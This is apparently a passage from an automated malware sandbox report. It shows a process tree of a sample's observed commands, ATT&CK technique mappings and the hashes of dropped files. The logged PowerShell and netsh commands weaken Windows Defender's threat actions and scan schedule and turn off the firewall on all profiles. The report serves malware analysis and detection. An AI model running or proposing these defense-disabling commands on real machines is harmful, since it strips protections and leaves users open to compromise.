    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1576

[2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4856

[2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1920

[2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4648

[2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Set-MpPreference -ScanScheduleDay 8"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4704

[2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "netsh advfirewall set allprofiles state off"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:5008

[3] C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:3020
Network
MITRE ATT&CK Enterprise v15
Persistence
- BITS Jobs (1)
- Create or Modify System Process (1): Windows Service (1)
- Event Triggered Execution (1): Netsh Helper DLL (1)
Privilege Escalation
- Abuse Elevation Control Mechanism (1): Bypass User Account Control (1)
- Create or Modify System Process (1): Windows Service (1)
- Event Triggered Execution (1): Netsh Helper DLL (1)
Defense Evasion
- Abuse Elevation Control Mechanism (1): Bypass User Account Control (1)
- BITS Jobs (1)
- Impair Defenses (2): Disable or Modify System Firewall (1), Disable or Modify Tools (1)
- Modify Registry (1)
Downloads
-
Filesize: 2KB
MD5: 627073ee3ca9676911bee35548eff2b8
SHA1: 4c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA256: 85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA512: 3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb
-
Filesize: 152B
MD5: 2ee16858e751901224340cabb25e5704
SHA1: 24e0d2d301f282fb8e492e9df0b36603b28477b2
SHA256: e9784fcff01f83f4925f23e3a24bce63314ea503c2091f7309c014895fead33c
SHA512: bd9994c2fb4bf097ce7ffea412a2bed97e3af386108ab6aab0df9472a92d4bd94489bb9c36750a92f9818fa3ea6d1756497f5364611e6ebd36de4cd14e9a0fba
-
Filesize: 152B
MD5: ea667b2dedf919487c556b97119cf88a
SHA1: 0ee7b1da90be47cc31406f4dba755fd083a29762
SHA256: 9e7e47ebf490ba409eab3be0314fa695bf28f4764f4875c7568a54337f2df70f
SHA512: 832391afcac34fc6c949dee8120f2a5f83ca68c159ff707751d844b085c7496930f0c8fd8313fd8f10a5f5725138be651953934aa79b087ba3c6dd22eaa49c72
-
Path: C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize: 4KB
MD5: db2b89dd4b1fd9cfc8fadb5046ebe67b
SHA1: 34eaf971922351327fcd802fc89eececcdc9febe
SHA256: 06c5e271e2186d2942bccd2d7b4473ee686ad8f7ffb54b7c7074706a696c4e55
SHA512: 58ffd46fae05dd9a3dfc5b9fe4a7ead5c6659eefa8673faf38d24383f8e2e89bd9f3b5064d1b48ba5837472128fe46de972e5d93d2c0ecaa1f77da7593842532
-
Filesize: 2KB
MD5: c863a889456175015e3b84781b82d90a
SHA1: becee9f4ad233f01bf3055d8d71a6cba8f858594
SHA256: 67b6119bb093fc2f80352fe044b33b799a3d3e030981fe896f8cdb03140f0f91
SHA512: 745c5a6b231aaac1f71d2cc379e54ad009a02c7d57b5c3427f14b531991a8373f585e347acea4415da61956f7e8e266d863c3dec2b6d71f3ad2d5ea36e3b895f
-
Filesize: 5KB
MD5: 2a611e8b405da657d669ad90231ba583
SHA1: 8703e98403b2e0bc58d0132cfd50bc9a28352883
SHA256: 794d26641f66b73816c67f6064af5b776a273d0a7aea2f46b7c7756be8d3c335
SHA512: ec9a39c76b542ff1790793eacc44dd376d5c33124358a1eacac74adc450121189a02448f9bdcb57d30597d64560173486d461a4da9ed034f3208c05d7d1ddffb
-
Filesize: 7KB
MD5: ed5358530afa92987e6a924f110e0989
SHA1: a55ab1627e57e05b7ee754e86b83f6e30ed79a77
SHA256: 00054ddc6e655e0cbcfe7cf2287e095faa66fc042da6679aabd5b10194a36765
SHA512: ae7f1d0cbd504892c0e502814939d89753214008c6670878f63fdf8728f5074134a735e2d76389986e28341f0520275a7999ba4e43a2160f90d9d88d26e9168b
-
Filesize: 7KB
MD5: eef35a099322a43dbcc347f04ce3b1bf
SHA1: 6052674ba2ec8f0052596ae6bc7ef198a02e3d4a
SHA256: 385d206f0a70a81b0dfa1ee8b9c118ef8894dd64f3dca06299291464dbb013d2
SHA512: 7856447fca3d2dbdb0e55e7c5fc62fd18cd2d06c02c04b825539b2dc3d2895c91bd92327e54dcb2d7704c4ac204f279f38c506dfe64f715f7481d3443c1ce831
-
Filesize: 6KB
MD5: d525e402ee24d4fc30dc3e4e75e52efb
SHA1: 12517d3ab3b3cc2e659799a8a2792c0fc0a835d8
SHA256: e18e6d106b8cd00b79bc614c58669c6350fe1e7f78d6d884fac5284906f6ebb2
SHA512: 52a0ec08697a4ba96b0761e9f5a24f933cc32e45a64894a62f7e046ff6740e820b0b836346714d992cab99cb831a3a8dbbcad80036ccd110b1abc6793482d73b
-
Filesize: 2KB
MD5: 38f7f4879c51009dc9f84850057aebe4
SHA1: 4443b852f7c6b315a71769b11c9e28ee015f1fc8
SHA256: 3aba0921b6c296f0810a627b591da9b7b4990a3a31c1d1f637498fe1e68797af
SHA512: 9c243b3bb7d51e53d4f7fa94d4dceeda4105e984a0c3c7897903ca1b34c95ba8542be3f7435fa80d74bea928ff0d8886ff42347e0fd0e0ad36857a0177fe4251
-
Filesize: 2KB
MD5: d4c9c8c28ba4a1155b1183a610c51633
SHA1: 7d27385a86f57b9a41a51b1657cc0905ee60ab14
SHA256: 3fbd2a1d6753401fd407c1c68a7876b6a2700d70c26b13154d261402bd5d4aab
SHA512: 72bf696674e1d0bc6295f12af2df0e4799b3f0f61cf9ed149301f884b9c24efe5397c1f7cdb35d974f114f99bd123d16c938f96113caefaa3e7494a304543e92
-
Filesize: 539B
MD5: 01b76bb2ef606eacdeeb226c93018d99
SHA1: 1d23e471c7740ecdd72cfd6ce23ae693ada71162
SHA256: e719fc5838b244f500c027f066592fcf3d48a40efbb647aa121112560942ebca
SHA512: d59fa864b40d377004daa237c6287635123c9e1b749daf643d9ebead55b35fc93c017140a97f469b5bdc18947c84e8161253e485eb2e36e63f45427ec0254932
-
Filesize: 16B
MD5: 6752a1d65b201c13b62ea44016eb221f
SHA1: 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256: 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512: 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
Filesize: 11KB
MD5: ae1297bd78a96151a31441b7c0b739c5
SHA1: f51e426fa24c4a5110c1b0fa97764054445f3510
SHA256: cfd85495b4777cdcca0c25477dc0fd005ce2b1ff9f2358ae927b4d0b745f5355
SHA512: bae8b86bb971a433615ece0884ee8d08288de08bf250516d4e4efd1f3aaa68844169d072cdf60399e8b482805f5c851a420e23c8ad5c2849769433a4167e101f
-
Filesize: 11KB
MD5: ab3d55530efeef3c5d17ce9e9b7aa25a
SHA1: 96f5eb5875a1d192e5a3e9a3ea3b6b100c9c593c
SHA256: c0203ebe193aed3d73756558698dfe9c86a2d2863d5b126bda7011ae9710026c
SHA512: 1bebd1a58010a77f396a6697f4d9aa8adb1be8087c885b41aad572763c087dc3b7174a167319b5fd9cc272e1617bcba90b0d75bdb3a7c672402e1dac5554e940
-
Filesize: 944B
MD5: 05b3cd21c1ec02f04caba773186ee8d0
SHA1: 39e790bfe10abf55b74dfb3603df8fcf6b5e6edb
SHA256: 911efc5cf9cbeb697543eb3242f5297e1be46dd6603a390140a9ff031ed9e1e8
SHA512: e751008b032394817beb46937fd93a73be97254c2be94dd42f22fb1306d2715c653ece16fa96eab1a3e73811936768cea6b37888437086fc6f3e3e793a2515eb
-
Filesize: 64B
MD5: 052b68d98977d4f52cc6afabfa743b06
SHA1: 63b671a71cc5ec6b76218b0094784a5e21e08e7f
SHA256: 199ac916bb90b9b2107eb749d5c65411c387c7d59f0a2d19d17674983287116a
SHA512: e20517e1d3b755c17c617f9cbab3de19a4b29fc16a3422bbde30530130c2865173b85ee24e336b20c4706740250bc062f789d0c6989d4ed15c6f8527033693af
-
Filesize: 1KB
MD5: ea292e0d870c21833e86a33dbdbeb4b5
SHA1: 1d4ea5bf2aa655df1a7dfe1542e8a0c11b10410b
SHA256: b06ce1c537b90fb95d640ec13aee0cccd4fcf225e2dde619cb3ac3def3ea8e78
SHA512: d6a7eb9de74196491f1f81cef9273b3259ffd2be51b68e17dd2fb336a7543b385ebe6d95cd57aeae9296395a51a8e3446ba14a2b8b938ab745d7df5c8e1deae2
-
Filesize: 944B
MD5: d0a4a3b9a52b8fe3b019f6cd0ef3dad6
SHA1: fed70ce7834c3b97edbd078eccda1e5effa527cd
SHA256: 21942e513f223fdad778348fbb20617dd29f986bccd87824c0ae7f15649f3f31
SHA512: 1a66f837b4e7fb6346d0500aeacb44902fb8a239bce23416271263eba46fddae58a17075e188ae43eb516c841e02c87e32ebd73256c7cc2c0713d00c35f1761b
-
Filesize: 944B
MD5: 80707036df540b6657f9d443b449e3c3
SHA1: b3e7d5d97274942164bf93c8c4b8a9b68713f46f
SHA256: 6651e5f976619cef991deef61776cf43d4c4b3d7c551dd2192b647df71586ab0
SHA512: 65e41e9e730fed4f7a7d3f6f35875a16948b897f87c8c70b371fd0ac7f0951814f6a75e7698665194bbc65a3665a684e7be229e7e24193b50483ae7e55eebf4f
-
Filesize: 948B
MD5: 75750301db717dee0ddce4939072ec41
SHA1: d4a763f4ced8ff5be9df24e0d6ec676a7a080527
SHA256: abfcadfc1dab687291dec5402f5472132f4d2460e85a498a37efa5ac9dc09888
SHA512: e02fbfc783aeb85a16422baf6df381b88415a89a29316695e48c1edb65745ec801759e276803207645d59b81e3ad38f584caad824772035ee6ce46c333f75ce3
-
Filesize: 948B
MD5: 2afc7f8f972d80c756469f519957ebe3
SHA1: a2b08d1c68d7c26f52784aa22c1c02cf73453c4a
SHA256: fc8adf84ff2cdbcb64cfbe3e035b9d4286fa1169b052139c168393970bee86bf
SHA512: 4d4a28cc652d1c57ebb92670f3474d41c645b3993086d9d132fb23444bbde4382993b50b2d4c919a5ab7307d53c770ad9869397ec5213eddfa84db2da0d1556e
-
Filesize: 948B
MD5: eb6bbad04121efc4b28aafcfb2098c9b
SHA1: 874882a3749c41301505e95510f761491c465073
SHA256: bdd1eb4ef60661fd7570aa4f6454ffe1072f57d213dd7263f89dafceee0e5bd5
SHA512: 7ade89430b42f124403449f4b8146ea4daad3bf87a53fe6aacdb28d759ad759ad6ea88db61723c1fa9c728d0d3c7aafa13527d15cf7149abbb4fa4fb4eb459d3
-
Filesize: 948B
MD5: b6c336e3b3cb2cd04d42baac1aa4aa0d
SHA1: 35a943816f3e9cd596e91be92c4bdb1b05a42d88
SHA256: 4518fb6ffb3f70be78cb243cac94fcf74d9c58d2e7bd8c510ebe696d3f81cb60
SHA512: 42c4a8f07051ac7c00014ddaa0b0db50bdbcb49a30ae96803e37f3a566c100932367e0a50baead881509ae4a4d49c769513626c5015fe0a02d1d3ae22ca759f4
-
Filesize: 948B
MD5: 67fc27fc887b927aeb2ff531b04c3c84
SHA1: a001b354b8d636a64ee2a519ca19dafb8e744a16
SHA256: a7ca81c6ea294d3450336418c895ab1774bd959e6b79b62716849e8c4607c25d
SHA512: 8c8eab70b6c5d0bbbc78760b25ea6deb7d4221d03a6f680999f4cd02da330c1cc14b6c0a5e8e4f0ac5295d037fe7e71932360f552db85bc8bbe2e9dea30f23b6
-
Filesize: 64B
MD5: 5caad758326454b5788ec35315c4c304
SHA1: 3aef8dba8042662a7fcf97e51047dc636b4d4724
SHA256: 83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391
SHA512: 4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693
-
Filesize: 944B
MD5: fcbfea2bed3d0d2533fe957f0f83e35c
SHA1: 70ca46e89e31d8918c482848cd566090aaffd910
SHA256: e97f54e5237ffeca4c9a6454f73690b98ac33e03c201f9f7e465394ecbc3ea38
SHA512: d382453207d961f63624ba4c5a0dea874e6b942f5cad731c262a44371fb25b309eacf608156e0234169e52337796128312e72edb0290c48f56104fe5e52509a6
-
Filesize: 64B
MD5: 55d46f537381013a3b35f9ac7b1ca381
SHA1: 3b6aed0a4b83bbcff9a4830ef36c050f1e5e9605
SHA256: f6e691fcc8f75da2a6c49f28d5db50699b5402bd9bde6a3d726a47a8a1a54e89
SHA512: 4447f51dd568f973c83ebc192f887e2447322947015c8d21d3218ec3ef86084099dc583b359effd9b733efee9f1c0dca6544a1f7531d7080476e570662081d4a
-
Filesize: 944B
MD5: 49c39329e38937c8e27f09fadb70c0f7
SHA1: 958c29d3bbb82b4c85162e70d0a96d8c6f389283
SHA256: 1a6a068d88a05119fc303cb10a417b655b243a1a3d9f89461aa51d97b9f99206
SHA512: 1405b839ad6be92d81004c736592df210e97f44dbb4f0c63779370eabb1a04d8c663eb55c3de3f189e34d35446c08809af7555c881a86fd3b85fcdf544a8cbd1
-
Filesize: 948B
MD5: a0e27123ec2730bd5d89828fd6a41cc2
SHA1: d1099e93025598a470d6cc9c0549595e8f8e9a7f
SHA256: fda70f35a9cbde9e93461cd72d0c668f964d8b07e5c43322e47ed602ceb177a9
SHA512: b73fba4357362fa2057fe5216490da71958e1edb6fd08fe7cd99d214a8a1a5381ff304584c7969cedfb790170ecd65cbe96e006c5d2e41ceff587138ba244d31
-
Filesize: 948B
MD5: d70b0a49b2727a97cc322ea54d2a66c7
SHA1: 57d984bd970307ad80665d97f5369ad644de8776
SHA256: bc38ea6605142cb9ec440231b665a5c5a53c499c7e25a77a94eb6491efdd2a65
SHA512: 90790e506f7453a63d4915fb50c7694184c3bc5b836979d19c15a240c6145d9bbc33d393007f4b39a782e789f6259974a1824e79e960a64c5f8703e4797fdd0d
-
Path: C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat
Filesize: 10KB
MD5: 3e1f5eeae74491d8850ef2c8b03a9a3b
SHA1: 0c02c9c2550107de6dd0eb740ac5668f292883c0
SHA256: 66756c0edf3925de7bcb685385e2a4f0b854cffd796a9e90eb1ed064b1fb0e30
SHA512: 7637f0807d88dbceeb68823a044583e2248ac1ba73c000da6560f94075635a27d15970df7e52f8315bdc2f1c45cff6f1ab7690e916b58307a533f8df24329c2a
-
Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize: 112B
MD5: 9313d55e26ad30ddcbc046fe8013a21d
SHA1: a5712ce8864d7b0ca88b94c64226dfeb2221457f
SHA256: 121ab5b57fb09d3c520a7fd6dfaa5b87844e1e8379a9635e7a737934e7e9226a
SHA512: 77b7f3c2aca2ba61519a9fed7dbb3e7f2dd803bd566eeb9531e1ed038dff68e88c4d2f73a83e37396fd475f57dbdef55966361176dde70d1343747aca5888ba7
-
Filesize: 307KB
MD5: 1d23efd21f4e61e620c7be5d70c66903
SHA1: 3f7b34380e10912c6aaed833b378392a57d22b49
SHA256: 9a6e38be267702f3b397fdc416dc2d0d520239dc8d3d983e353e0422ac7941fe
SHA512: 4a657cc7ba2ed904c0742b504a0bdc685fb1c69b345ea9aef928ff0c2710fd17af42ca4d79d8055588372b43b9e953ff99ab4dea7ce07bbaf733f1b2a7495f46
-
Filesize: 181B
MD5: affda83f3fadf6044e5c68100e9ed3f9
SHA1: 71da30cbb01d3bee4028d333d61cf0dc72be67d6
SHA256: 93ead31dd979c1a0627a4fc8a1a690d6a1a22b647d4a61487ccb88fdbe035da6
SHA512: db0b78824f31505cb176a9bc7a71bd67cbce617cb6a599dfd25be9e9173dacba8363de09f4bbd96c46b67d1027d9a5065bf08a1f2a39f06c6f0cec2986ed0a9f
-
MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512: cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e